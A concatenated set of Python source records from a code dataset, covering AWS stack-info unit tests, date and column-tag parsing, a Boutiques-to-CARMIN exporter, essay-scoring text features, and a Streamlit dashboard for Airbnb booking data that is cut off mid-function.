mock.patch('stack_info.DeploymentInfo', return_value=mock_deployment) as mock_DeploymentInfo:\n with mock.patch('stack_info.DeploymentAccessInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.DeploymentAccessInfo(MOCK_STACK_ARN, client = mock_client)\n actual_deployment = target.deployment\n actual_deployment_2 = target.deployment\n self.assertIs(actual_deployment, mock_deployment)\n 
self.assertIs(actual_deployment_2, mock_deployment)\n mock_DeploymentInfo.assert_called_once_with(mock_deployment_stack_arn, deployment_access_info = target, client = mock_client)\n\n\n\nclass Test_stack_info_ResourceGroupInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN, client = MOCK_CLIENT, stack_description = MOCK_STACK_DESCRIPTION)\n self.assertEquals(target.stack_type, stack_info.StackInfo.STACK_TYPE_RESOURCE_GROUP)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_resource_group_name_provided(self):\n mock_resource_group_name = 'test_resource_group_name'\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN, resource_group_name = mock_resource_group_name)\n self.assertEquals(target.resource_group_name, mock_resource_group_name)\n\n def test_resource_group_name_discovered(self):\n mock_resource_group_name = 'test-name'\n mock_parameters = { 'ResourceGroupName': mock_resource_group_name }\n with mock.patch('stack_info.ResourceGroupInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN)\n actual_resource_group_name = target.resource_group_name\n self.assertEquals(actual_resource_group_name, mock_resource_group_name)\n\n def test_deployment_provided(self):\n mock_deployment = 'test_deployment'\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN, deployment_info = mock_deployment)\n self.assertEquals(target.deployment, mock_deployment)\n\n def test_deployment_discovered(self):\n mock_deployment_stack_id = 'test-deployment-stack-id'\n mock_parameters = { 'DeploymentStackArn': mock_deployment_stack_id }\n mock_deployment = 'test-deployment'\n with mock.patch('stack_info.DeploymentInfo', return_value = mock_deployment) as mock_DeploymentInfo:\n with mock.patch('stack_info.ResourceGroupInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN)\n actual_deployment = target.deployment\n actual_deployment_2 = target.deployment\n self.assertEquals(actual_deployment, mock_deployment)\n self.assertEquals(actual_deployment_2, mock_deployment)\n mock_DeploymentInfo.assert_called_once_with(mock_deployment_stack_id, client=target.client)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Lumberyard/1.7.0.0/dev/TestHyperealVR/AWS/project-code/test/test_stack_info.py","file_name":"test_stack_info.py","file_ext":"py","file_size_in_byte":42482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"585495477","text":"import re\n\nfrom django.conf import settings\nfrom dateutil.parser import parse\nfrom datefuncs import *\nfrom make_config import *\n\nMONTHS = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\nMONTH_TAG = re.compile(\"^(\\d{4})M(0[1-9]{1}|10|11|12)$\")\nQUARTER_TAG = re.compile(\"^(\\d{4})Q([1-4]{1})$\")\nQUARTERLY_TAG = re.compile('(\\d{4})(Quarterly)')\nANNUAL_TAG = re.compile('(\\d{4})(Annual)')\nMONTHLY_TAG = re.compile('(\\d{4})(Monthly)')\nDAILY_TAG = re.compile('(daily_)(\\d{4}-\\d{1,2}-\\d{1,2})')\nTRAILING12M_TAG = re.compile('(12Mtrailing)(-?)(\\d{4}-\\d{1,2}-\\d{1,2})?')\nMULTIYEAR_TAG = re.compile('(\\d{1,2})yr_(\\d{4}-\\d{1,2}-\\d{1,2})?')\n\n\ndef extractDateRange(request, inclusive=True):\n \"Common notation to pull out to/from dates. Returns 2 date objects\"\n\n if request.GET.has_key('year'):\n yyyy = int(request.GET.get('year'))\n from_date = start_of_year(yyyy)\n to_date = end_of_year(yyyy)\n if not inclusive:\n from_date = day_before(from_date)\n elif request.GET.has_key('month'):\n smonth = request.GET.get('month')\n syear, smonth = smonth.split('M')\n yyyy = int(syear)\n mm = int(smonth)\n from_date = start_of_month(mm, yyyy)\n to_date = end_of_month(mm, yyyy)\n if not inclusive:\n from_date = day_before(from_date)\n elif request.GET.has_key('period'):\n period = request.GET.get('period')\n if period == 'YTD':\n today = datetime.date.today()\n from_date = start_of_year(today.year)\n to_date = today\n elif period == 'QTD':\n from_date, to_date = QTD(datetime.date.today())\n elif period == 'HTD':\n from_date, to_date = HTD(datetime.date.today())\n elif period == 'MTD':\n from_date, to_date = MTD(datetime.date.today())\n \n if not inclusive:\n from_date = day_before(from_date)\n else:\n from_date = as_date(request.GET.get('from', settings.DATE_EARLY))\n to_date = as_date(request.GET.get('to', settings.DATE_LATE))\n return from_date, to_date\n\n\ndef config_fromcoltag(col_tag, rpt_desc, calc_type):\n\n # annual period by quarter... 
eg 2016Quarterly\n quarterly_match = QUARTERLY_TAG.search(col_tag)\n if quarterly_match:\n yr = quarterly_match.groups()[0]\n title = yr + ' ' + rpt_desc\n\n if calc_type == 'diff':\n columns, column_titles = quarterly_periods(yr)\n elif calc_type == 'as_of':\n columns, column_titles = quarter_ends(yr)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n annual_match = ANNUAL_TAG.search(col_tag)\n if annual_match:\n yr = annual_match.groups()[0]\n title = yr + ' ' + rpt_desc\n\n if calc_type == 'diff':\n columns, column_titles = annual_periods(yr)\n elif calc_type == 'as_of':\n columns, column_titles = annual_ends(yr)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n \n monthly_match = MONTHLY_TAG.search(col_tag)\n if monthly_match:\n yr = monthly_match.groups()[0]\n title = '%s for %s -- Monthly Detail' %(rpt_desc, yr)\n\n if calc_type == 'diff':\n columns, column_titles = monthly_periods(yr)\n elif calc_type == 'as_of':\n columns, column_titles = monthly_ends(yr)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n daily_match = DAILY_TAG.search(col_tag)\n if daily_match:\n dt = parse(daily_match.groups()[1]).date()\n title = '%s for %s -- Daily view' %(rpt_desc, dt.isoformat())\n columns = [prev_busday(dt), 'D%s' % dt.isoformat(), dt]\n column_titles = ['Yesterday', 'Change', 'Today']\n\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n trailing12M_match = TRAILING12M_TAG.search(col_tag)\n if trailing12M_match:\n if trailing12M_match.groups()[2]:\n dt = parse(trailing12M_match.groups()[2]).date()\n else:\n dt = datetime.datetime.today().date()\n\n title = '%s from %s -- trailing 12mth' %(rpt_desc, dt.isoformat())\n if calc_type == 'diff':\n columns, column_titles = trailing_monthly_periods(dt)\n elif calc_type == 'as_of':\n columns, column_titles = trailing_monthly_ends(dt)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n multiyear_match = MULTIYEAR_TAG.search(col_tag)\n if multiyear_match:\n if multiyear_match.groups()[1]:\n dt = parse(multiyear_match.groups()[1]).date()\n else:\n dt = datetime.datetime.today().date()\n\n years = int(multiyear_match.groups()[0])\n\n title = '%s from %s -- %dyr view' %(rpt_desc, dt.isoformat(), years)\n if calc_type == 'diff':\n columns, column_titles = multiyear_periods(dt, years)\n elif calc_type == 'as_of':\n columns, column_titles = multiyear_ends(dt, years)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n month_tag = MONTH_TAG.match(col_tag)\n if month_tag is not None:\n yr = int(month_tag.groups()[0])\n mth = int(month_tag.groups()[1])\n tag_label = '%s %d' % (MONTHS[mth-1], yr)\n\n if calc_type == 'as_of':\n columns, column_titles = single_month_end(mth, yr, col_tag)\n title = '%s for %s' %(rpt_desc, tag_label)\n elif calc_type == 'diff':\n columns = [col_tag]\n column_titles = [tag_label]\n title ='%s for %s' %(rpt_desc, col_tag)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n quarter_tag = QUARTER_TAG.match(col_tag)\n if quarter_tag is not None:\n yr = int(quarter_tag.groups()[0])\n qtr = int(quarter_tag.groups()[1])\n\n tag_label = 'Q%s %d' % (qtr, yr)\n if calc_type == 'as_of':\n columns, column_titles = single_quarter_end(qtr, yr, col_tag)\n title = '%s 
for %s' %(rpt_desc, tag_label)\n elif calc_type == 'diff':\n columns = [col_tag]\n column_titles = [tag_label]\n title ='%s for %s' %(rpt_desc, col_tag)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n \n \"\"\"\n # didn't match anything\n raise ValueError('Unexpected col_tag: %s' % repr(col_tag))\n \n except:\n raise ValueError('Unexpected col_tag: %s' % repr(col_tag))\n \"\"\"","sub_path":"accountifie/toolkit/utils/coltags.py","file_name":"coltags.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"422791309","text":"#!/usr/bin/env python\n\n# Copyright 2015 - 2017:\n# The Royal Institution for the Advancement of Learning McGill University,\n# Centre National de la Recherche Scientifique,\n# University of Southern California,\n# Concordia University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport json\nimport os\nimport uuid\n\nclass Exporter():\n\n def __init__(self, descriptor):\n self.descriptor = descriptor\n\n def convert_type(self, boutiques_type, is_integer=False, is_list=False):\n if is_list:\n return \"List\"\n if boutiques_type == \"Flag\":\n return \"Boolean\"\n if boutiques_type == \"Number\":\n if is_integer:\n return \"Int64\"\n return \"Double\"\n return boutiques_type\n\n def convert_input_or_output(self, input_or_output, is_output):\n param = {}\n param['name'] = input_or_output.get('name')\n param['id'] = input_or_output.get('id')\n if is_output:\n param['type'] = 'File'\n else:\n param['type'] = self.convert_type(input_or_output.get('type'),\n input_or_output.get('integer'),\n input_or_output.get('list'))\n param['isOptional'] = input_or_output.get('optional') or False\n param['isReturnedValue'] = is_output\n if input_or_output.get('default-value'):\n param['defaultValue'] = input_or_output.get('default-value')\n if input_or_output.get('description'):\n param['description'] = input_or_output.get('description')\n return param\n\n def carmin(self, output_file):\n carmin_desc = {}\n with open(self.descriptor, 'r') as fhandle:\n descriptor = json.load(fhandle)\n\n carmin_desc['identifier'] = str(uuid.uuid4())\n carmin_desc['name'] = descriptor.get('name')\n carmin_desc['version'] = descriptor.get('tool-version')\n carmin_desc['description'] = descriptor.get('description')\n carmin_desc['canExecute'] = True\n carmin_desc['parameters'] = []\n for inp in descriptor.get('inputs'):\n carmin_desc['parameters'].append(self.convert_input_or_output(inp,\n False))\n for output in descriptor.get('output-files'):\n carmin_desc['parameters'].append(self.convert_input_or_output(output,\n True))\n carmin_desc['properties'] = {}\n carmin_desc['properties']['boutiques'] = True\n if descriptor.get('tags'):\n for prop in descriptor.get('tags').keys():\n carmin_desc['properties'][prop] = descriptor['tags'][prop]\n carmin_desc['errorCodesAndMessages'] = []\n for errors in descriptor.get('error-codes'):\n obj = {}\n obj['errorCode'] = errors['code']\n obj['errorMessage'] = errors['description']\n carmin_desc['errorCodesAndMessages'].append(obj)\n\n with 
open(output_file, 'w') as fhandle:\n fhandle.write(json.dumps(carmin_desc, indent=4))\n","sub_path":"tools/python/boutiques/exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
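# Editor's note: a hedged usage sketch for the Exporter record above. The import
# path is inferred from the record's sub_path, and both file names are illustrative
# placeholders; neither is part of the original record.
from boutiques.exporter import Exporter

# Convert a Boutiques tool descriptor into a CARMIN pipeline description.
Exporter("tool_descriptor.json").carmin("carmin_descriptor.json")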
+{"seq_id":"436916714","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 23 21:33:32 2018\r\n\r\n@author: lucas\r\n\"\"\"\r\n\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nimport scipy\r\nimport re\r\nimport nltk.data\r\nfrom textblob import Word\r\nimport expandContractions as eC\r\nimport discourseMarkers\r\nimport Prompts\r\nimport spacy\r\n\r\n\r\n\r\n\r\ndef pre_process(essay):\r\n \r\n \"\"\"Função que expande contrações, põe em caixa baixa e retira whitespace a mais\"\"\"\r\n \r\n essay_proc = eC.expandContractions(essay.lower())\r\n essay_proc = re.sub(' +', ' ',essay_proc)\r\n return essay_proc\r\n\r\ndef token_features(essay):\r\n \r\n \"\"\" Utiliza o objeto Vectorizer para extrair features relacionados a tokens\"\"\"\r\n vector = CountVectorizer()\r\n tokenized_essay = vector.fit_transform([essay])\r\n \r\n \"\"\"Feature 1: Número de Tokens\"\"\"\r\n nb_of_tokens = tokenized_essay.toarray().sum()\r\n \r\n \"\"\"Feature 2: Media de caracteres por palavra\"\"\"\r\n nb_of_char = 0\r\n for position,item in enumerate(vector.get_feature_names()):\r\n nb_of_char += len(item)* tokenized_essay.toarray()[0][position]\t\t\t# multiplica o tamanho da string(token) pela sua frequência\r\n mean_char_p_word = nb_of_char/nb_of_tokens\r\n \r\n \"\"\"Feature 3: Número de palavras diferentes \"\"\"\r\n nb_dif_words = len(vector.get_feature_names())\r\n \r\n return (nb_of_tokens,mean_char_p_word,nb_dif_words)\t\r\n\r\ndef nb_of_speliing_errors(essay):\r\n \r\n \"\"\"Feature 4: Utiliza a bilbioteca textblob para correção de erros de ortografia\"\"\"\r\n essay = re.sub('@\\S+','',essay) # Retira nomes padrão do ASAP iniciados em @\r\n \r\n vector = CountVectorizer()\r\n vector.fit_transform([essay])\r\n \r\n list_tokens = vector.get_feature_names()\r\n \r\n spell_errors = 0 \r\n for i in list_tokens:\r\n __result = None\r\n __result = re.search('@\\S+', i) \t\t\t\t\t\t\t\t\t\t# retira nomes padrão do ASAP como @Location\r\n if __result is None:\r\n w = Word(i)\t\t\t\t\t\t\t\t\t\t\t\t\t\t # da biblioteca textblob\r\n result_tuple = w.spellcheck()\t\t\t\t\t\t\t\t\t # o método spellcheck() returna uma tupla com a sugestão de correção e o nível de certeza em %\r\n if i != result_tuple[0][0] and result_tuple[0][1] == 1.0:\t\t\t# só faz correções que o corretor tem certeza, 100%, evita sugestão de singular em formas plurais\r\n spell_errors += 1\r\n nb_of_spell_errors = spell_errors\r\n return nb_of_spell_errors\r\n\r\ndef get_cos_dist(essay,prompt_number):\r\n \r\n \"\"\"Feature 5: Retorna a distância cosseno de dois textos usando Scikit\"\"\"\r\n __vectorizer = CountVectorizer() \t\t \r\n red_promp = [essay,Prompts.get_prompt(prompt_number)] \t\t # O CountVectorizer() cria duas arrays de frequências de palavras do\r\n y = __vectorizer.fit_transform(red_promp) \t\t # vocabulário do essay e do prompt\r\n x = y.toarray()\r\n transformer = TfidfTransformer(smooth_idf=False)\r\n tfidf = transformer.fit_transform(x)\t\t\t\t\t\t\t\t\t\t # Faz as operações do TF.IDF\r\n z = tfidf.toarray()\r\n cosine_distance = scipy.spatial.distance.cosine(z[0], z[1])\r\n return cosine_distance\r\n\r\ndef discourse_markers_features(essay):\r\n \r\n \"\"\"Feature 6: Numero de marcadores de discurso na redação\"\"\"\r\n \r\n counter=0\r\n for discourse_marker in discourseMarkers.multi_word_exp():\r\n result = None\r\n result = discourse_marker.findall(essay)\r\n re.sub(discourse_marker,'',essay)\r\n counter += len(result)\r\n \r\n 
for discourse_marker in discourseMarkers.discourseMarkers():\r\n matches = None\r\n searchable_pattern = \"\\W\" + discourse_marker + '\\W'\r\n matches = re.findall(searchable_pattern,essay.lower())\r\n if matches != None:\r\n counter += len(matches)\r\n nb_of_discourse_markers = counter\r\n \r\n \"\"\"Feature 7: Number of discourse markers per sentence\"\"\"\r\n \r\n sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\t\t\t\t\t\r\n n_of_sentences = len(sent_detector.tokenize(essay))\r\n discourse_markers_p_sentence = nb_of_discourse_markers/n_of_sentences\r\n \r\n return (nb_of_discourse_markers,discourse_markers_p_sentence)\r\n\r\ndef nb_optimal_sentence(essay):\r\n \r\n \"\"\"Feature 8: Number of sentences with 15 to 20 words\"\"\"\r\n counter = 0\r\n sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\t\t\t\t\t\t# NLTK sentence tokenizer\r\n essay_sentence_list = sent_detector.tokenize(essay)\t\t\t\r\n\t # essay_sentence_list is a list of sentence tokens\r\n for i in essay_sentence_list:\r\n n_words_sentence = len(i.split())\r\n if n_words_sentence >= 15 and n_words_sentence <= 20:\r\n counter +=1\r\n nb_of_optimal_sentences = counter\r\n return nb_of_optimal_sentences\r\n\r\ndef nb_first_person_pronoun(essay):\r\n \r\n sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\r\n sentence_nb = len(sent_detector.tokenize(essay))\r\n \r\n fp_prn_nb = 0\r\n f = open(\"./first_person_pronouns.txt\", 'r', encoding = 'utf8')\r\n dict_prn = dict.fromkeys(f.read().lower().split(),None)\r\n\r\n norm_e = re.sub(\"[^a-z]\",' ',essay,flags = re.IGNORECASE)\r\n for i in norm_e.lower().strip().split():\r\n if i in dict_prn:\r\n fp_prn_nb += 1\r\n \r\n return (fp_prn_nb, fp_prn_nb/sentence_nb)\r\n\r\ndef nb_demonstrative_pronoun(essay):\r\n \r\n demon_prn_nb = 0\r\n f = open(\"./demonstrative_pronouns.txt\", 'r', encoding = 'utf8')\r\n dict_prn = dict.fromkeys(f.read().lower().split(),None)\r\n \r\n nlp = spacy.load('en_core_web_sm')\r\n doc = nlp(essay)\r\n \r\n for token in doc:\r\n if token.text in dict_prn and token.pos_ == 'DET':\r\n demon_prn_nb += 1\r\n \r\n return (demon_prn_nb)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"ASAP_essay.py","file_name":"ASAP_essay.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
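# Editor's note: a minimal, self-contained sketch of the TF-IDF cosine-distance
# feature (Feature 5 in the record above), dropping the project-local Prompts and
# expandContractions modules; the sample sentences are hypothetical stand-ins.
# Note that scipy.spatial must be imported explicitly for distance.cosine to resolve.
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from scipy.spatial.distance import cosine

def cosine_distance(text_a, text_b):
    # word-frequency vectors over the shared vocabulary of both texts
    counts = CountVectorizer().fit_transform([text_a, text_b]).toarray()
    # re-weight the raw counts with TF-IDF, mirroring get_cos_dist()
    tfidf = TfidfTransformer(smooth_idf=False).fit_transform(counts).toarray()
    return cosine(tfidf[0], tfidf[1])

print(cosine_distance("the cat sat on the mat", "a cat on a mat"))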
+{"seq_id":"623066702","text":"# -*- coding: utf-8 -*-\n\"\"\" Data Analytics Streamlit Application\n\nModule used to launch data analytics dashboard.\n\nUsage\n-----\n\n>>> import streamlit as st\n>>> from src.visualization_app import visualization\n>>> page = st.sidebar.selectbox(\"Choose a page\", [\"Homepage\", \"Data Analytics\",\n \"Recommendation System\"])\n>>> if page == \"Homepage\":\n>>> ...\n>>> elif page == \"Data Analytics\":\n>>> visualization()\n\n\"\"\"\n\nimport sys\nfrom pathlib import Path\n\nsys.path.insert(0, str(Path(__file__).resolve().parents[1]))\n\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n@st.cache(suppress_st_warning=True)\ndef load_data():\n \"\"\" Load dataset for part 1 of our data analytics\n\n Part 1 data analytics is based mainly off of the training set, thus this is the\n dataset that is loaded.\n\n Returns:\n pd.DataFrame: Processed dataset\n\n \"\"\"\n user = pd.read_csv('./airbnb-recruiting-new-user-bookings/train_users_2.csv')\n\n # clean up data\n user = user[(user['age'] < 110) & (user['age'] > 0) & (user['date_first_booking'] != '0')]\n user = user.drop(['signup_flow', 'first_affiliate_tracked'], axis=1)\n user = user.rename(columns={'date_account_created': 'Date of Account Created',\n 'timestamp_first_active': 'Activity Time',\n 'date_first_booking': 'First Booking Date',\n 'gender': 'Gender', 'age': 'Age', 'signup_method': 'Sign Up Method',\n 'language': 'Language', 'affiliate_channel': 'Affiliate Channel',\n 'affiliate_provider': 'Affiliate Provider', 'signup_app': 'Signup Place',\n 'first_device_type': 'Device Type', 'first_browser': 'Browser',\n 'country_destination': 'Country Destination'})\n user_date = user[(user['First Booking Date'] != '0') & (user['Age'] != 0)]\n user_date['Age'] = user_date['Age'].astype(int)\n user_date = user_date[(user_date['Age'] >= 18) & (100 >= user_date['Age'])]\n user_date.dropna(inplace=True)\n format = \"%m/%d/%Y\"\n try:\n user_date['First Booking Date'] = pd.to_datetime(user_date['First Booking Date'],\n format=format)\n except:\n format = \"%Y-%m-%d\"\n user_date['First Booking Date'] = pd.to_datetime(user_date['First Booking Date'],\n format=format)\n\n user_date['First Booking Date'] = user_date['First Booking Date'].apply(lambda y: y.strftime('%Y-%m'))\n user_date['Gender'].replace({0: 'Unknown', 1: 'Male', 2: 'Female'}, inplace=True)\n\n return user_date\n\n\ndef clean_data(x, cou):\n \"\"\" Clean dataframe by removing NA values and keep useful columns.\n\n Args:\n x (pd.DataFrame): Dataset\n cou (list): List of countries\n\n Returns:\n\n \"\"\"\n\n x = x[x['Country Destination'].isin(cou)]\n c_x = x.sort_values(['First Booking Date']).groupby(['First Booking Date', 'Country Destination']).agg(\n 'count').reset_index()\n\n c_x = c_x[['First Booking Date', 'Country Destination', 'id']]\n\n if cou:\n temp = list(c_x[c_x['Country Destination'] == cou[0]]['First Booking Date'])\n\n for i in cou:\n a = set(temp).difference(list(c_x[c_x['Country Destination'] == i]['First Booking Date']))\n for j in a:\n c_x.loc[len(c_x)] = [j, i, 1]\n a = set(list(c_x[c_x['Country Destination'] == i]['First Booking Date'])).difference(temp)\n for j in a:\n c_x.loc[len(c_x)] = [j, cou[0], 1]\n\n c_x.sort_values(by=['First Booking Date'], inplace=True)\n c_x.reset_index(drop=True, inplace=True)\n\n return c_x\n\n\ndef plot_country_time_series(c_x, cou):\n \"\"\"\n Show plot of visited frquency by date with selected countries.\n\n Parameters\n 
----------\n c_x: dataframe\n cou: list of countries\n\n \"\"\"\n plt.figure(figsize=(11, 9))\n\n for i in cou:\n if cou is None:\n continue\n data = c_x[c_x['Country Destination'] == i]\n data = data.append(data)\n plt.plot('First Booking Date', 'id', data=c_x[c_x['Country Destination'] == i])\n plt.yscale('log')\n fontsize = 'xx-large'\n\n plt.legend(tuple(cou), fontsize=fontsize)\n plt.xlabel('Bookings from 2010-2015', fontsize=fontsize)\n plt.title('Country Booking Trends', fontsize=fontsize)\n plt.ylabel('Number of Bookings (log)', fontsize=fontsize)\n plt.xticks(np.arange(1, 73, 6), ['Jan-10', 'July-10', 'Jan-11', 'July-11', 'Jan-12', 'July-12',\n 'Jan-13', 'July-13', 'Jan-14', 'July-14',\n 'Jan-15'], fontsize=fontsize, rotation=30)\n plt.yticks(fontsize=fontsize)\n st.pyplot()\n\n\ndef plot_country_most_visited(user_date):\n\n \"\"\"\n Show visualization of visited frquency with selected countries.\n\n Parameters\n ----------\n user_date: dataframe\n\n \"\"\"\n cou = ['US', 'Other', 'FR', 'CA', 'GB', 'ES', 'IT', 'DE', 'NL', 'AU', 'PT']\n # cou=['CA']\n plt.figure(figsize=(10, 5))\n fontsize = 'large'\n a_x = user_date[user_date['Country Destination'].isin(cou)]\n a_x = a_x.groupby(['Country Destination']).agg('count').reset_index()\n a_x = a_x[['Country Destination', 'id']].sort_values(['id'], ascending=False)\n a_x.plot.bar(x='Country Destination', y='id', rot=0, logy=True, legend=False,\n fontsize=fontsize)\n plt.ylabel(\"Total Bookings (logged)\",fontsize=fontsize)\n plt.xlabel('Countries', fontsize=fontsize)\n plt.title('Frequency of Country Bookings from 2010-2015', fontsize=fontsize)\n st.pyplot()\n\n\ndef plot_age(user_date, cou):\n \"\"\"\n Show visualization of visitor demograph with selected countries.\n\n Parameters\n ----------\n user_date: dataframe\n cou: list of countries\n\n \"\"\"\n # cou=['US','Other','FR','CA','GB','ES','IT','DE','NL','AU','PT']\n # cou = ['AU', 'US']\n\n a_x = user_date[user_date['Country Destination'].isin(cou)]\n conditions = [\n (a_x['Age'] >= 18) & (a_x['Age'] <= 30),\n (a_x['Age'] >= 31) & (a_x['Age'] <= 40),\n (a_x['Age'] >= 41) & (a_x['Age'] <= 50),\n (a_x['Age'] >= 51) & (a_x['Age'] <= 60),\n (a_x['Age'] >= 61)]\n choices = ['18-30', '31-40', '41-50', '51-60', '60+']\n a_x['age'] = np.select(conditions, choices)\n a_x = a_x.groupby(['age', 'Gender']).agg('count').reset_index()\n a_x = a_x[['age', 'Gender', 'id']]\n a_x\n plt.figure(figsize=(10, 7))\n c = 0\n t = []\n for i in a_x['Gender'].unique():\n t.append([])\n for j in a_x['age'].unique():\n try:\n temp = a_x[(a_x['age'] == j) & (a_x['Gender'] == i)]['id'].iloc[0]\n t[c].append(temp)\n except:\n print('lol')\n c = c + 1\n\n bar = [1, 2, 3, 4, 5]\n barwidth = 0.8\n mal = plt.bar(bar, t[2], color='#2ECC71', width=barwidth, edgecolor='white')\n fem = plt.bar(bar, t[1], color='#BB8FCE', bottom=t[2], width=barwidth, edgecolor='white')\n unk = plt.bar(bar, t[0], color='#F4D03F', bottom=np.add(t[1], t[2]), width=barwidth, edgecolor='white')\n\n fontsize = 'xx-large'\n plt.ylabel(\"Total\", fontsize=fontsize)\n plt.xlabel('Age Range', fontsize=fontsize)\n plt.title('Age Distribution with Selected Countries', fontsize=fontsize)\n plt.xticks(bar, choices, fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.legend((unk[0], fem[0], mal[0]), ('Unknown', 'Female', 'Male'), fontsize=fontsize)\n st.pyplot()\n\n#@st.cache(suppress_st_warning=True)\ndef load_data_part2():\n \"\"\"\"\n load data for part 2 visualization from session.csv and train_user_2.csv\n\n prepare for further use of making 
plots in part 2\n\n Returns:\n DataFrame df,\n the session information of users whose desination is known,\n (the intersection between session.csv and train_user_2.csv)\n\n dict device_dic,\n {user_id: device_type}, the device type of each user\n\n dict result_dic,\n {user_id: country_destination}, the destination of each user\n\n dict lang_dic,\n {user_id: language}, the language of each user\n\n \"\"\"\n\n #s_df = pd.read_csv('./airbnb-recruiting-new-user-bookings/sessions.csv')\n t_df = pd.read_csv('./airbnb-recruiting-new-user-bookings/train_users_2.csv')\n\n result_dic = t_df.set_index('id')['country_destination'].to_dict()\n lang_dic = t_df.set_index('id')['language'].to_dict()\n device_dic = t_df.set_index('id')['first_device_type'].to_dict()\n\n #s_df['country_destination'] = s_df.user_id.apply(lambda x: result_dic[x] if x in result_dic.keys() else '0')\n #s_df['lang'] = s_df.user_id.apply(lambda x: lang_dic[x] if x in lang_dic.keys() else '0')\n\n #df = s_df[s_df['country_destination'] != '0']\n\n #return df, device_dic, result_dic, lang_dic\n return device_dic, result_dic, lang_dic\n\n\ndef plot_avg_time_action_type(df, device_dic, result_dic):\n \"\"\"\n plot for part 2.1 what steps are taken for booking a travel destination\n\n Args:\n df (dataframe): the input dataframe that we are going to plot about\n\n device_dic (dict): {user_id: device_type}, the device type of each user\n\n result_dic (dict): {user_id: country_destination}, the destination of each user\n\n \"\"\"\n tmpdf = pd.DataFrame(df.groupby(['user_id', 'action_type'])['secs_elapsed'].agg(np.sum))\n tmpdf['id'] = tmpdf.index.map(lambda x: x[0])\n tmpdf['action'] = tmpdf.index.map(lambda x: x[1])\n tmpdf['device_type'] = tmpdf.id.apply(lambda x: device_dic[x] if x in device_dic.keys() else '0')\n tmpdf['country_destination'] = tmpdf.id.apply(lambda x: result_dic[x] if x in result_dic.keys() else '0')\n\n str1 = 'Unsuccessful booking'\n str2 = 'Successful booking'\n\n fontsize = 'large'\n ax = pd.DataFrame(\n {str2: tmpdf[tmpdf['country_destination'] != 'NDF'].groupby('action_type')['secs_elapsed'].agg(np.mean),\n str1: tmpdf[tmpdf['country_destination'] == 'NDF'].groupby('action_type')['secs_elapsed'].agg(np.mean)\n }).plot.barh(figsize=(12,5))\n\n plt.title('Average Time spent on an Action', fontsize=fontsize)\n plt.ylabel('Action type', fontsize=fontsize)\n plt.xlabel('Time/ms', fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.xticks(fontsize=fontsize)\n st.pyplot()\n\n\ndef plot_language_time(df, device_dic, result_dic, lang_dic):\n \"\"\"\"\n make a plots for part 2.2 and part 2.3.\n\n 2.2. average time that a single user spends during booking with respect to languages\n\n 2.3. 
